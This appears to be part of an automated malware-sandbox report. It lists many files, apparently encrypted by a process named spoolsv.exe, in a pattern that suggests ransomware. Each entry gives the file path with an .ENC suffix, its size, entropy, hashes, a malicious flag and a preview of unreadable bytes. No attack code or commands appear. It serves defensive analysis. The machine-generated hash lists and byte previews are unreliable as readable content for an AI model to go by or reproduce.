                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}q...*m...#.d.......E....AB.Y.7.0..g....~.....5;./K".Z[.S..$.y.{..(....,.....7.P...P.D.!a[J....x.!m.L..'......E....Z...OL..!.).&..D.D......2U......c.w..\w...R.s..yo....U..G..c....0.PMb ......gzD..8..$pIX.2..h...6..l..&..Q...wy9..~...'.....X....................`=..uD^.8..E.5J.].W.A.M.g.....a\....$T...N...\....e...j.*5....P-.[.^..h.6...#2s..4.p.........d.I.u.!.W....V.[....W..\I..;>.r..m.:.T.!S....a.LX.P.. ..Q.\..?9u.t.$bq..\.Ug..:.V..b....n1...I_A.N....................?."...5.......d3.L7.....f.Wp.:.9%....S...........m.{.....M.5xhNw...1....$..f.[.....K../.........D..U..|.X.m<...4.C...f..\q]...Y......b...?....l..Q,kR.}E..-.J..;.....R./.....Lx.BB$=.2......S'.j..-....]...>.>._..qq.!..4.pE..{FI.B..=..I.L.D|.O...r.n..eY..3A.....W>..7c...............~..Nt2[.......'Q~+M...F....?W..}.*p....k.A..y3(..U1Mz.....'{.Y....G.....d......q....Kg!..0d.W..3.h......D.8.:q.......-.s......2F.h..2..l.H5...T!..... ...v/.+

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_669696935\c50698d5-282c-4c8d-9fa6-c155f2d8d379.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1673792
                                                                                                                                                                                                                                                      Entropy (8bit):7.9999139303175655
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:49152:HLnS568SmWaTOJGD1hYBs6+YIF3s58KQIXpLXlgk7Q:DS5oHEv8a6dtn1XuIQ
                                                                                                                                                                                                                                                      MD5:13E684C72B36039289B77BB438F894C6
                                                                                                                                                                                                                                                      SHA1:01E98029F452A7EA44BC1D48C7613DBEB18C7CD8
                                                                                                                                                                                                                                                      SHA-256:B7704B8EE142B318A624489337ED7DEAFF0170D73AD41E63FF1AF9C39F113BDC
                                                                                                                                                                                                                                                      SHA-512:021BA60E4BA041A1AAA55DDF04B0F649A00AB3DDEB834A9D8E0B9944F3852E50362206FFFB720FF1C1F0552A6E48914670053B969DCEC700D38F0FD2FF260DCC
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}.".._....&.\.(T...~/\.....p.}w.K.-.+...]..k.T<...../]L......A..4.>..y..8;.kk..wL!.7.(..?...*.4&p....\#I...k.w........AhD..f#...H.p.....#..eg..Q}P...?-.E.._f...k8...C.!.\y:oX...{.$.s.rG...B.,7...d...h....2..j.........v.0.I.l../...p.P.8%.A.]..../l....Q.Z ..e..x..I..Rc..F.M .H..sBjJ..++`#.4..{.2.F..._.3....]A...v.j?..Fs.B...=..K..".....s.U...bOY..!.*>B+..E}..E.I.+]G...PM.$....fu.E..m.W.r*.*.4"*..2.=u=LU...Y......tO.......{$.L..).[p.Z.=..Y.0...X....F..0`p.lx..7.QS.Bq'..<9.OK5..;0.x.h..:...11..Sc"^....,G]..)..OKM..B..8.N^..FS.x..... ....u........>.d.d......0.......#.j...C...{.....tF..$g.:.C.+....-.p..T<.z.u|.2.@..k.....T.v..H.;....).....(..?.....b.|.5..... C.c......L....".q......`......ZU..vRg..F?@.Zh.5....k.. r&.C...s.go5\...[.B..T?,l...*.}..'..........aI...../I..E...Jd.....Z.g........u..,R......#F..T.)b.S.=].....u.o.7`...gl..O..~y.G..O...!......ZF......Y.n..Q.K..*..\M.><..5...b.3]..D.[.....2[.J9.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_677372717\84fb0759-2f62-4b78-b3f8-d06ffbe5ed10.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60752
                                                                                                                                                                                                                                                      Entropy (8bit):7.996567806970473
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:dLUJToSxBgr+GEil1Tv55NQ1rv9vYC6B1/6IwTu/AOPU7oRg6f+E/SxM8KXc73H8:da/jovv5SrVfy/6I9HPU7cEkj6e4FY
                                                                                                                                                                                                                                                      MD5:D1126C75AEE3EDF8DA6A45685A1F15A7
                                                                                                                                                                                                                                                      SHA1:12FFC82D4B73F0AAAF651A78FF7EBF2D329D2C8F
                                                                                                                                                                                                                                                      SHA-256:17BE49800DDB3EE49CA2B1C7AD5CA94D7680FEED6EFD48B153E3F4B240B76504
                                                                                                                                                                                                                                                      SHA-512:1F0F913C6A04C753F9286E5626088E0189F67D2B0D3A5A17FC4F53AC52AE1E90EB4B5C8824756F0B1BFD3517A7E75E5EB90E9781C9E5BB6BA69C55FEC2D66340
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}....i.L.T...1u..R..!R.y.......}.u...Cr.{.A[..!....?>.S......E...` k..e.....j..s .h.1. U.i.i.z..7...\.[.F.....<.pU....f...64....KEz.Xx.w.......N..$.....oJ..I..#..q.....Fmp..C#.{....m..._..=.y<b........M.7.....m....kT..W..........x.W].@ .{D.._[.5....4n.M..WIv.W.Q........O.[?..+.x..#.{.O(."...o..L...Z.g....(..h.x*.'.).yyE...ne..AS.p9>(.&=..y1.L....>1|0...zT..p.V........?S.O...JKY.X...4....).|Unz,qAW..~...........j..c:..0.Ri.a>o6.....m....$O@..1.v..eG>..J.a...m......T...).;.....6...$+S..!.B.Q]n...B.rY..|!..M.6...,..~..dWF+Gd..c@......9....P..3...Y..#..."f.d...q..3...AZ.]..0..6.e.P..M?...\x..6...n...M.....f..._...AH.a.B...p.If..1..'....'.......z....#.".Lrj%|....~.....3K..{.@..*9...'....:m......F....................Df=...e.@6.F...(..\.+...>...r......8G..C...J.j_.rB........F..Z..c...[.....oK8E.@.........:..l.L!.<=..(.w. 6.;.X..1f2....6..{.`.h...@.A~........G.`...V ...;....s)i....C8`9...S).4.)...a.......9

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_719535175\7f41fcdb-a3ef-47d4-86cb-0f3555d3db82.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6352
                                                                                                                                                                                                                                                      Entropy (8bit):7.969095260624727
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:HnnwPHlLIYzWz8IKHpWFDPMoZ1Lyc3igbeSOAwbDYdcZ4sE4wWGFnz7zUgCeUF+G:HAzuKHmDPMC1LyFn1xYdcq7bRMtKc
                                                                                                                                                                                                                                                      MD5:8AAA85CDBE6A3E54B080A5CC5E35F6FA
                                                                                                                                                                                                                                                      SHA1:C669D02B743D37472279579FE4E03DD37E0FBFB0
                                                                                                                                                                                                                                                      SHA-256:8B3BC24CB82BD0CC20F2EF0E11D1554905054520E4FE98E96A6C2440F485D97B
                                                                                                                                                                                                                                                      SHA-512:C7929FC534716C55C1F8E827BEBD749D6E93C1ADDC7215BD86DADDCA603D3BFAEEBB7E77D48449970B6EE2F6AB82788BD8974BD84BB6503EA35C65DFE9D01B79
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}f...V{R.h.DO&..[6-.3.JY.....\.~'.|................c.j.av[..........._qe.F.{.%=)...H..*.W......*\..D..m....w8..p........a.yQ.P2{....x"...gL.....H..+<.o.....R7VE.v....O....X...i.#Pg..".Fm".9.. !{....4.f..].X.^<..9>..h".18k._0$..B.Q......l.`.../h3.$....,...E.J.v...bS......d./ftk..'.BU..A.Qs..g.Zy.M......>W.F..Fp..l..(T0.#.2..%BLC`.e...X..?.&.....s..v..C_.jIO..w..K."ey.0>...Hx..t.V..K;...(1At.....zc....M.v.]...a..*.^..;.Xz..Ig..SVD..h....x.T..IC..MsB..Hw...u....ek$K...qe Gk......I.1.y........7.S.4.~.L.-"1hu.........e.....m....=u.!qXb...4...$"...H..fBuB.x.CZ...%....fo..s;A<V{pr..8.....FMiV#0S.D......T..sB.........^Aq!4.....Nk./G.oc..3L...>._S....*.*..,W...G.I.09d..5...Q...$.%3.Y._V9%...3f.r...j..$...P.r.. .H..............).~*1.e.#}B9..V.} ...Q4..W.T..V..|?.E-.\..o4.C.\.L...v.LaXwqh[...@l....z.j..V..%%.(S.v~v..`[?{R..4T.m.L..E.o...ZQ.>;.W..c...t...K..w.iI?H.3..>..o.....M....|D...e....u...7.$.{!..(m9...u.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_867342333\e9f8c500-8e5e-4ddd-9bef-4e0b522248e9.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6112
                                                                                                                                                                                                                                                      Entropy (8bit):7.9714013229080605
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:R9IT+sxS64PeQAmDWUuTKeKKtDpoK6gnIGMoi1YY71Zkg4eCPOedRMPG30sgNTh:RWS64Pe9GmTrDeiIGMCY71ZVyPOa+e1S
                                                                                                                                                                                                                                                      MD5:6A2D854E8E3D76006096C2C09A386486
                                                                                                                                                                                                                                                      SHA1:71226823B5AC502A15C33F32A65FE6B62957EBF5
                                                                                                                                                                                                                                                      SHA-256:F8EEBB67A8F0CE32B86C26DF5C77FDC580DADA5ACBF1DAB46AC2F33FFCE45C1A
                                                                                                                                                                                                                                                      SHA-512:601F7FBB961D13A2DA38E01BAD6B5C800C728D369FFCA2CC60B4BDB6A9B1CB6A37286C292B921F4FFDB13307F8830B54B84E965398C46234918A940CC8D66BDE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}.b.W.N3.R.GtB<..zT*...........1..9S.%m.n...L3$.b6t.0&....E.......Lv+w."..L...\..kl.;TZ.....U..rf...k...N.<..M;.W_.@.t...s]..."E.7?.Y..... YYU.t s..=.c?'.>...N.Mq0t..#..{.. ..l.x...v..oD.yZ.....|S.<........{..#...'...U.}9....*&Y...5...(....Q..Y....#..L...B......rsg...Z...4....\<hSz........i.X...db...>.j....`.0./.F..j>:M=...h?..[t'`...j.<J0...b.(%..4.JW.&>..B.5.W...C....g..~.....;....l2..<.....-QB.5d!.Z..)..*.G.<i....~...K..p.f.3a.o.U...M..BA.V#lv..Zh.><.<X...i...T...E...w.gF2.[...>F.?I?<./..FX.t.*.|......A2Q..%.......cK{Lc....g).m..q....o...AE.Q...9..zl.c..%<..z...?...=`.e...c2.QE......A."w..Xa..`.f.tWGz.....u.h...`.W....jfZ.J.4%jMr..=+......U...........pY.f...X...{.zx&..=..FLX..'..YO..:x......dD.D.......q...t.x..c$....r.5.io|.^..c.3.#r`.1....g;.......B..+....Y.).9$h+5%.V.|..Z.f..?...H`8....v^s.3..D\...^.!..A.-.u...}B.7g.]iWpk...a{2_O.....`.t...<A...K.?.....oB......V.,z. A......%..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\f92dd30f-d70e-4c79-98e6-b827a8bb342f.tmp.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):248544
                                                                                                                                                                                                                                                      Entropy (8bit):7.9992133294189625
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:3xS5+Z4pqf0yHicn6JtwhIQft0OlFLHCfQy7E9gCLuG:3xFiqf07G6JtgICNvy7NCl
                                                                                                                                                                                                                                                      MD5:33753FCE8AE700EE67E6353B0A2641BE
                                                                                                                                                                                                                                                      SHA1:D04FE815F3744BA66410D3D342DCBBDDBC666909
                                                                                                                                                                                                                                                      SHA-256:9235EB2AE19720C58244743BC011AFADC7F1EF72124CE71DED4A9607F9E6BFC9
                                                                                                                                                                                                                                                      SHA-512:C350ACAD8C51DD12FF0E7530CB3D98A876F4AA7F26D7AF199E5EDB14A68395555B4A364CD9DE1DDC28F713B610EA8F3A8643A025D3BB480C68AA8AC68B6F0FE7
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:4.....^.._.C*..QD.A......O.......]..G....H....;.g..1U..&.LYJW...p..r{J..`...?...;...$.jN.H..H..7.+#.."....x$.^ ...ME4E........d?i<.Qd.N.O.bC...E.t.Y7p6.&.O..I.e.&..c;TQ..=|...pr..f....V..03/..I..;V.B..Otv8....=.<9$.r,...<x..&..^+../X.&...|..7cD....}....6.P..%..x...mj.qI|.....7..\v..T!.....p..B...G...$.....}.m...$-......5M..-.2....9..q/oq....+v...........A .7.p.ck5..or.G.Z..'.....\..R..f.3....7.[..$.I...U$.v...;>.w%.j3L.....GH.a.....mn...W.8d.3...Do.3.....l....s1?.=..S*.0B.g.,.......u.?.Iq...8.-..E....!.vA....>.!....n...+.H..P.y?$..R.F:....W3..7.w...v^n...Y...V.....N&.KU......zR.c._7.6..s\XW8...$a}..`L.J..._&.+....:|..ms.885}..m.1..i.).89..b..D.0..mie...[QL.u.......,...h.....D.Dz.h..(N..q.ev.*.......L.EB.....z..n.,..u.N..]....i.e..%....V...T.M....J...Q..8..I.3g.a..+RU.q....c..l._d.0..B+q.>..Ln.g.],..)X^%.t.....I...k..x_.u....a.....Z{@1.(......t3.?....a...};......5.......}....0..:..T.......#...V%.n.....)...r...A.6z.xA.x.^...Gr..m.-.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\msedge_installer.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11984
                                                                                                                                                                                                                                                      Entropy (8bit):7.983583127878898
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:kgY8GwcON83cB8t6ORoMKzcSHsQZU7r2vEL8perbonY0SQC3YQVWRHQG:gtONQBt6W1McSHGvjOerbonY0SzICG
                                                                                                                                                                                                                                                      MD5:1B1D1E7AEE441864B31F20A9D0176DD5
                                                                                                                                                                                                                                                      SHA1:B574EB98762F295D365982449D035AE1DA841B84
                                                                                                                                                                                                                                                      SHA-256:5742764D2AFAA10848805C49DCCAF304E9EA932492502CAC8416CA4FB2E2555A
                                                                                                                                                                                                                                                      SHA-512:4659779147C98F6AE5664EF57719DE653C95B51A3BDFA34AE034B4A5EC028CD187A9E255C6915E1160D52577B3ED963612F8D0647D832B18B9365C935CED17E1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...Y.>.F...E.b.......*......t..1..h...Q.....<..y\..3eT...z*p....!c.a.}...L......$.3..q.A.M.....M^...L..l.0.&.wM....&.....V:F=.._3.R...y?A.....9.~.#aY.|..?.d.:A..K.$......WU.^}........&v6j.=.$.`Z..d.sZ..e,.|....G..-.e.|....J.X~.hJ.6......(.+.p..)n.G....@...g..%../.x....8....^.]....."...0....[.).P..N..<.........vL=...._...#OB.'=..Y...tB.+..I.;.FR....y...p..`[`....|..x...*.a...d/...F.z.Ru..S..@.................I3....8`p.!Z._.T0!.S=.V.OTO(..U..We......y>f.l.V .v*|z1N..P.%e..x..7..,.....c.....u.X. .,...e).c...A.,K.EC...L.cq .IkgBI....T.....T....M..E.W.l<I.)..j7."..eux.8!'.....=........|:...P..s.D......i]g.pnL....*T.Z...>..o....B.....'..G.cx....j.......G#t...J..4.dq...$.)IHP..8Y...y....).........[..f.Ng.I....8C..h=....q.a..w)..W73?tF.n.m.....]a})...O.{......k-5....f..EV@..a.B......I...>|b|.m.....M.d..k.....8s.1C..S.t....O....G;.8."...$:K..j......%m..O...s......t2}.............F{N>uX.^.i..YYf.T......*..JC.i.y4,..\.`..x.\........N#..D..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\prep_Form_JSI_API_not_a_real_file_V8_perf.cache.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):720
                                                                                                                                                                                                                                                      Entropy (8bit):7.750079915228464
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:ab6FI1AvzCaR4TdZn9dLHiHXv0lA+l9VXFJs0brDwWOVeqJzA/nTWrGUFK:ab6HVRkZ9dLHiHXYAAVXY6rDjae+unTj
                                                                                                                                                                                                                                                      MD5:5C8BA87DF4245A9D404595C7799E7D2E
                                                                                                                                                                                                                                                      SHA1:AAB92745CE64E2D36A4EA8EEF17E501D9F0354D5
                                                                                                                                                                                                                                                      SHA-256:1C29E45D9759C58F6830DA9CC8BAA8E453E5F6C8ED6332DD9B04B58635BEF44F
                                                                                                                                                                                                                                                      SHA-512:37A646CB579BD08D720FB5472F15C58708D708D69CF73280DD2EF1ADCF9D9B1222967CD6D8F0CE2FCB3FE9A7E2040B604E80E7F2430004EA49CE42C7E9971FE8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.Pj.*.#0.L%...".#M]..1.......ra.l..(...%.../...Y'mN`a&?ta:&.;K.H!_F.j.V........f..#.{...........z.....!/..?.............Q..uz..F.-"e....'.|3'....Iw..x..DO.........[..f...'..]..c0~Wv.w@...(....x_H..v..&....D.#7.]*.MM..Ter..l..).>..Cr5.]n.2.K....l.j..A5.\).2..z...5..}..y..Y..g....,+.i..[X.B.cW...n..^."k....p].*...Y.[.Y.*...1.......R~...i..X_Z|.[EP...Q..Nh#.....W^K....{TM..@...z.....'...u.....C..P..>...O`..B..c*....<{3.....zj.K/..........4Z....q....3..... ......UF..`_.TrtJ&w>.1......D!t..(..6Hig..q.~.PUV......F.3..#)y...0R.>U..0......~.S.....n.6....2!i.X....2.Vm/....g._8_....x-~....S...g......./....]"..?.n....;..;...u..mw(3....&./...$gB!!t....}.{y.w...;.[...fr..h.....=9......"..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\prep_foundation_win32_bundle_V8_perf.cache.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):661696
                                                                                                                                                                                                                                                      Entropy (8bit):7.999727367068501
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:12288:N8WvGpDvF98cT1RS49Sa0fevBbyLvyu3Uq2+bS9srfwwYT:xvGpDvF9ZPS+S7Raus+m9YS
                                                                                                                                                                                                                                                      MD5:7592031808EF10CC4E7062B792EE0D53
                                                                                                                                                                                                                                                      SHA1:4E7844D842552092A8B781FDA025D5E2E8B87BF4
                                                                                                                                                                                                                                                      SHA-256:9DC473EA47D557C10AB9F21058AEDC58C2B4C1631598591694888AF9BDC7FECB
                                                                                                                                                                                                                                                      SHA-512:128A4006C98B24B0A4F530B171B9DA0C38F928087BBF39FD903DA026BF15E3B5CF401969397BF1F3E4D3C88FBFA63EB190509923A7FB2A56344A5870C97D90D6
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:(.F"kk7...Z..PR.*(P.E.O;.K.ww.x.o.f.)..\(...o.L.W$.yGD5...s..0......E....g....;.@#......t"XO.k..B....q.w..P#,.'..H....(&w..V. .W..@..i.%0k...l.X.p.}..H......4c^.Wt>/..3......x.M.X.$/}..+.R($.,...s.2...bv[.....rDZS.;.w=..4A.$KE....H.wyu.^..+.vv.....T...o.,.s.p.g....o..E.P8..Y..$.>.....3.,....~...01'Ri.m }......B.......?g.S..T.Nd...M....V....#(.R..!)|...........c....t.....&.`.....Q.2=..^.P.....r.s.=_.2..$..@bp...-.7FV..;.....&..t.Z.R...t...(7..|.b....X..,..:.3.89....o0....B+W........a!....a.~ex'U`[Upe.z....}Nz...WA..G..d..y.zI.....uX..K...q}w...._...p.n../..&!..n.n...n.C..SS..M.C.3H<.;.5N.6./....9.o...@...b~....q.h.x:{p..T..8.Y..}]....U...V+D}...........>.#Gk..........M;.=..y...R..'{'x.3._.&.=....u....ZR]......u.+Z.l.5....F.i.o../.=~.x.S#of.BIVh.K......G......B'.Sn..&....P..(.O).?.......4.F.&x(..H..xJ...(v.9xv....|..W..V..v]t1rj....`UN..6...........I.>.1...#'...rf.3...94r...#r..@.-Vj.9..`.).~L....q@U.hs.G....q.8../..l......l...x....D.O.,F..e....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.cache.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):192976
                                                                                                                                                                                                                                                      Entropy (8bit):7.999103187865964
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:3072:jsNazf4xqyx+WD0otdYbKKyZe6PiXmEWOAZFGqgujo4idFPn54KLfEy1TPKj6q:jrsqysWD0HKKy46PWKOAZFPdo4cdXLfq
                                                                                                                                                                                                                                                      MD5:3640FE0F0ADF9959753B04ECDAC0A2C4
                                                                                                                                                                                                                                                      SHA1:6D338D0F5E0C16C4A100E63E7F4A26F976F66EEC
                                                                                                                                                                                                                                                      SHA-256:A71969935AF33D3A688B59F4EEF7663F4AAF923C43FD282AFD7AB0B150B17263
                                                                                                                                                                                                                                                      SHA-512:3315FA517EC2F69D56277D9923A5545F06D52104F7B0D86293A7E78A8C46313B90E7ED44C158DD18DAD53892A1B3D76D0D04076D005B081C839CEB6271217ECC
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.1$?..)DI....@....z........bK.G.!J.......y.#[..0 i..A...6...(...w....+....m..`.......q....=...[..,...p6-...*.t.Z....q....J.!GYt}..\.^....C...3!.p.}y..>.e.\E5u...|.....L..._N:.v,.{..6....N .9..g....8.;...F.d.C......p..GU.....K....T5H...0.s.Q$.#.v#....aL.,.z.g..Z.5`...E...m......I....jvb3[.F..E.I.b2....5f...d..8F..n--.*.L.m5;..............:.V@...y...'y,Y,....?E.p.^....b....{M.......I8g9.3..b.C0......w...AH....%..I...s.RV.Xf..d.g..\~.....E.................O......)........rC.=^..eF6c.M.........V.i.,.Ht..kSZ...&.L.c..r...0UaN...wgLQ.v.gE....A..e.W$.87<.{....M.].-...Y..T.h...I...+.|,. .K.....^............P..#._.].....'..|"..i5.[.....427.t.J.T./.U7.......f..7.G....o..k..&...#....+.-.a...V.wSY.o....)..l....b;J~Y....:\s*+...D_.x.z+.....URm...b_C.o...!..3;.......>.Z`.......'c(....K..y...7~1....%....m."..5.T...{.....$P].Q....~KS....GV..TE.;kl..@..L.d.r.y.},Ap..Q...P.z.pE.>,..5....B.....9K/..../....*..V.6.g.M......f.l.1.A....<1=....../0I..[

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir10952_1826612563\CRX_INSTALL\manifest.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1104
                                                                                                                                                                                                                                                      Entropy (8bit):7.827268216724588
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:C+KP7YsfXsoSMD6hwaPpdEwEg3MOCBK8KHETGgA:+D0oSMOSaPzREiMfBK8G4A
                                                                                                                                                                                                                                                      MD5:50029BA4E54F1D063BF63C67D6AC775E
                                                                                                                                                                                                                                                      SHA1:2F5DC7C3F10323DF85149B0CE441DEC7FC3F3BFC
                                                                                                                                                                                                                                                      SHA-256:CD3131DC1E09A420AF1A862AE1DCF78B2D9FA483DA4312743E9772B0E09EFA4C
                                                                                                                                                                                                                                                      SHA-512:85583D78031AFEA7DAB3A3FA2708FF95445764AD7765CE49CC5B6792AEED9D09B09BB11F485DCD79EA62086F37F7B8E1D804D022CACDC034A776DD10D74C54D7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...L9.-..uj.{D[.....X.<c.7s.R.,wm% .y.+@'.F-.)...6.S.~>/.r.h..e.-.(}FE..B1._(..3..2a...%nL-y.*....ih..W...#!q5...b.N..{.B.+.gH..o..,.n...08?)ul..`.]...~.i.....<]..&ts........R.L...01766..H.i.U..b... ..B...{!>.uU..F3..Js.......ibO.X..8T....E.c.8..$-..Y..Mf.M|..d6]|.~..^~..t>R..d.+..1Z.I....=.`.8......N.,..I....OvDO...D.2..bM..K......f.I.........lMv.WP.+y...5!..X..f...V;.e..V.r`...P._..MYIX.6.[...jj..i%..v..{....i.iL._s.!.egu..74.j,V_lN..,X..."f[vFm. ..].{....Q......$L.........zw.....9*u..3....v......Dr..&-.h#S.r......<}.2....,...ES...\4.(L.eR..q.5..\g+.U.Do .7.K......P...LzR.?...j..o.:......0#.R/c....|.o...)j..8K....a."...5.........kj..p..._.e.P!>e...?.:......{u.1..... .7w/X-,m.....p.9.b.....<ne....qRy......ork....XXl..........2..]*....y.9......|..@...D[.....s.h.1f...B..3...q....!..T\....X....q."......dv.}.L_.]x@....2...(0;.....,.....<..h..S........87.n.k..b..\.$...$.g..."......`......<.....0...q..V.vQ.mD.N?.....W>K...jY..l.o{...s.f...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\common\analytics.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):25888
                                                                                                                                                                                                                                                      Entropy (8bit):7.992841192688658
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:R4WWdCNWknBOMsaTGpM7VPZIAkBTc2LMatAeIPa9kJyzZMe8cdiLWFmvfLGFmRgN:RgCpzZGO0TVUPlJhPcdiL9rOmRMuXny
                                                                                                                                                                                                                                                      MD5:167413EBF8D5C7FD1235BFE1539AD70F
                                                                                                                                                                                                                                                      SHA1:D843A26C07B30DA9F178CF8E6ACEA7F71841F346
                                                                                                                                                                                                                                                      SHA-256:F3B237E2092B5B3EBA38CD381766F259627A4E80F9FC0A5D5E2AE771A0B50FC2
                                                                                                                                                                                                                                                      SHA-512:F33BD1A2C68E64739D1D181B80456ABAFBFD80CAEB5CA9880056EC9ED38A3A0CBE33DA39F26A2A3C81B802602020634258973D2729EE9747542C6232CD29B7A8
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R#;..3.h....&.e.!0v.....Q....`hD7..X) 0...o.....L...Q...K...6..G.m[......K....y.\.h...8S.o....@.?D?..5.+P.Q3.b.G..(..(.._D..\.N...:..l..9.<.}...8.`."..g./..=uL..:G<!'T.|.i

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\common\constant.js.ENC

                                                                                                                                                                                                                                                      Download File
